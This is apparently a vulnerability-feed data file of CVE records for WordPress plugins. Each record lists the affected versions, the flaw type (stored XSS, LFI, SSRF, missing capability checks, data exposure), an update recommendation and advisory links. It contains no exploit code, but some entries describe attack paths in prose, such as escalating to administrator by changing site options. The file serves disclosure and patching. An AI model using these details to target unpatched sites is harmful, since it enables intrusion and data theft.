{"CVE_ID":"CVE-2024-0615","slug":"content-control","versionImpact":"2.1.0","versionEndExcluding":"2.2.0","description":"The Content Control \u2013 The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.0 via the API. This makes it possible for unauthenticated attackers to extract post titles, IDs, slugs, statuses and other information including post content. This includes published content only.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54272","slug":"radius-blocks","versionImpact":"2.1.2","versionEndExcluding":"2.2.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RadiusTheme Radius Blocks \u2013 WordPress Gutenberg Blocks allows Stored XSS.This issue affects Radius Blocks \u2013 WordPress Gutenberg Blocks: from n\/a through 2.1.2.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/radius-blocks\\\/vulnerability\\\/wordpress-radius-blocks-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/radius-blocks\\\/vulnerability\\\/wordpress-radius-blocks-plugin-2-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3645","slug":"bit-form","versionEndExcluding":"2.2.0","description":"The Contact Form Builder by Bit Form WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c11f1e-6ea0-468c-b974-4aea9eb94b82\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58c11f1e-6ea0-468c-b974-4aea9eb94b82\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13621","slug":"gdpr-framework","versionImpact":"2.1.0","versionEndExcluding":"2.2.0","description":"The GDPR Framework By Data443 WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b48ecbb-c459-4c39-825d-61744d36f2fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b48ecbb-c459-4c39-825d-61744d36f2fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6369","slug":"export-wp-page-to-static-html","versionImpact":"2.1.9","versionEndExcluding":"2.2.0","description":"The Export WP Page to Static HTML\/CSS plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on multiple AJAX actions in all versions up to, and including, 2.1.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to disclose sensitive information or perform unauthorized actions, such as saving advanced plugin settings.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47cb48aa-b556-4f25-ac68-ff0a812972c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47cb48aa-b556-4f25-ac68-ff0a812972c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/cancelRcExportProcess.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/cancelRcExportProcess.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/deleteExportedZipFile.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/deleteExportedZipFile.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/exportLogPercentage.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/exportLogPercentage.php#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/requestForWpPageToStaticHtml.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/requestForWpPageToStaticHtml.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/saveAdvancedSettings.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/saveAdvancedSettings.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/searchPosts.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/searchPosts.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/seeLogsInDetails.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/includes\\\/AjaxRequests\\\/seeLogsInDetails.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3002740\\\/export-wp-page-to-static-html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3002740\\\/export-wp-page-to-static-html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4271","slug":"photospace-responsive","versionImpact":"2.1.1","versionEndExcluding":"2.2.0","description":"The Photospace Responsive plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018psres_button_size\u2019 parameter in versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bc98896-6ff9-40de-ace2-2ca331c2a44a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bc98896-6ff9-40de-ace2-2ca331c2a44a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2831424\\\/photospace-responsive\\\/trunk\\\/includes\\\/class-photospace-responsive-gallery.php?contextall=1&old=2544748&old_path=%2Fphotospace-responsive%2Ftrunk%2Fincludes%2Fclass-photospace-responsive-gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2831424\\\/photospace-responsive\\\/trunk\\\/includes\\\/class-photospace-responsive-gallery.php?contextall=1&old=2544748&old_path=%2Fphotospace-responsive%2Ftrunk%2Fincludes%2Fclass-photospace-responsive-gallery.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2966110%40photospace-responsive%2Ftrunk&old=2875667%40photospace-responsive%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2966110%40photospace-responsive%2Ftrunk&old=2875667%40photospace-responsive%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3063","slug":"shopperapproved-reviews","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Shopper Approved Reviews plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ajax_callback_update_sa_option() function in versions 2.0 to 2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopperapproved-reviews\\\/trunk\\\/shopperapproved.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopperapproved-reviews\\\/trunk\\\/shopperapproved.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c042b347-2884-436d-abd3-6931548f18d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c042b347-2884-436d-abd3-6931548f18d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5348","slug":"nd-elements","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Elements For Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.1 via the 'beforeafter_layout' attribute of the beforeafter widget, the 'eventsgrid_layout' attribute of the eventsgrid and list widgets, the 'marquee_layout' attribute of the marquee widget, the 'postgrid_layout' attribute of the postgrid widget, the 'woocart_layout'  attribute of the woocart widget, and the 'woogrid_layout' attribute of the woogrid widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55b86e2-b42e-483d-93cd-2f09af64dbc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e55b86e2-b42e-483d-93cd-2f09af64dbc7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/beforeafter\\\/index.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/beforeafter\\\/index.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/eventsgrid\\\/index.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/eventsgrid\\\/index.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/list\\\/index.php#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/list\\\/index.php#L401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/marquee\\\/index.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/marquee\\\/index.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/postgrid\\\/index.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-elements\\\/trunk\\\/widgets\\\/postgrid\\\/index.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094318\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094318\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6046","slug":"eventon-lite","versionImpact":"2.1.7","versionEndExcluding":"2.2","description":"The EventON WordPress plugin before 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored HTML Injection attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97f1d403-ae96-4c90-8d47-9822f4d68033\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97f1d403-ae96-4c90-8d47-9822f4d68033\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12507","slug":"optio-dentistry","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Optio Dentistry plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'optio-lightbox' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optio-dentistry\\\/tags\\\/2.1\\\/optio-dentistry.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208800%40optio-dentistry&new=3208800%40optio-dentistry&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208800%40optio-dentistry&new=3208800%40optio-dentistry&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4241118f-9bcb-4dec-abd2-7172db2cf445?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4241118f-9bcb-4dec-abd2-7172db2cf445?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4388","slug":"eventon-lite","versionImpact":"2.1.7","versionEndExcluding":"2.2","description":"The EventON WordPress plugin before 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4086b62c-c527-4721-af63-7f2687c98648\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4086b62c-c527-4721-af63-7f2687c98648\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5639","slug":"team-showcase","versionImpact":"2.1","versionEndExcluding":"2.2","description":"The Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tmfshortcode' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b26060-294e-4d4c-9295-0b08f533d5c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3b26060-294e-4d4c-9295-0b08f533d5c4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L489\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L893\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-showcase\\\/trunk\\\/team-manager-free.php?rev=2912143#L893\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980614\\\/team-showcase\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980614\\\/team-showcase\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1784","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.19.0","versionEndExcluding":"2.19.1","description":"The Spectra \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the uagb block in all versions up to, and including, 2.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.19.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/tags\\\/2.19.0\\\/classes\\\/class-uagb-init-blocks.php#L1276\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-gutenberg\\\/tags\\\/2.19.0\\\/classes\\\/class-uagb-init-blocks.php#L1276\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243058%40ultimate-addons-for-gutenberg&new=3243058%40ultimate-addons-for-gutenberg&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243058%40ultimate-addons-for-gutenberg&new=3243058%40ultimate-addons-for-gutenberg&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ac33fd5-602b-4810-96e1-850ea6ee739d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ac33fd5-602b-4810-96e1-850ea6ee739d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1120","slug":"woo-thank-you-page-nextmove-lite","versionEndExcluding":"2.18.1","description":"The NextMove Lite \u2013 Thank You Page for WooCommerce and Finale Lite \u2013 Sales Countdown Timer & Discount for WooCommerce plugins for WordPress are vulnerable to unauthorized access of data due to a missing capability check on the download_tools_settings() function in all versions up to, and including, 2.17.0. This makes it possible for unauthenticated attackers to export system information that can aid attackers in an attack.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d9332be-2cf0-46cd-81e4-6436aeec0f83?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finale-woocommerce-sales-countdown-timer-discount\\\/trunk\\\/includes\\\/wcct-xl-support.php#L710\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finale-woocommerce-sales-countdown-timer-discount\\\/trunk\\\/includes\\\/wcct-xl-support.php#L710\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042127%40finale-woocommerce-sales-countdown-timer-discount&new=3042127%40finale-woocommerce-sales-countdown-timer-discount&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13451","slug":"bit-form","versionImpact":"2.17.5","versionEndExcluding":"2.17.6","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.17.4 via file uploads due to insufficient directory listing prevention and lack of randomization of file names. This makes it possible for unauthenticated attackers to extract sensitive data including files uploaded via a form. The vulnerability was partially patched in version 2.17.5.","recommendation":"Update to version 2.17.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Util\\\/FileHandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Util\\\/FileHandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233293\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3233293\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b23bdba3-8947-47e4-b208-55e42865ab72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b23bdba3-8947-47e4-b208-55e42865ab72?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13450","slug":"bit-form","versionImpact":"2.17.4","versionEndExcluding":"2.17.5","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.17.4 via the Webhooks integration. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. The vulnerability can also be exploited in Multisite environments.","recommendation":"Update to version 2.17.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1072\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1072\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/Form\\\/AdminFormHandler.php#L1312\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Core\\\/Integration\\\/WebHooks\\\/WebHooksHandler.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227207\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227207\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d935f4c5-5d69-42d9-be22-7a44d9aa885a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d935f4c5-5d69-42d9-be22-7a44d9aa885a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12190","slug":"bit-form","versionImpact":"2.17.3","versionEndExcluding":"2.17.4","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the bitform-form-entry-edit endpoint in all versions up to, and including,  2.17.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view all form submissions from other users.","recommendation":"Update to version 2.17.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204875\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204875\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209668\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209668\\\/bit-form\\\/trunk\\\/includes\\\/Frontend\\\/FormEntryView.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9dab37-4118-4e13-857c-9aa072d25edf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce9dab37-4118-4e13-857c-9aa072d25edf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
